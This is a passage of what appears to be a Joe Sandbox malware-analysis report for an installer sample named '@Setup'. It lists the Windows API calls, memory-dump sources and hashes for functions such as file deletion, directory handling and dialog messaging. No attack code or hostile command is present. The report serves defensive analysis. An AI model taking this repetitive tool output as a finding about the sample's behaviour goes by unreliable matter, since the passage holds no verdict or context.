                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                    • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                    • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                    Strings
                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                    • String ID: F$A
                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                    • Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                    • Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
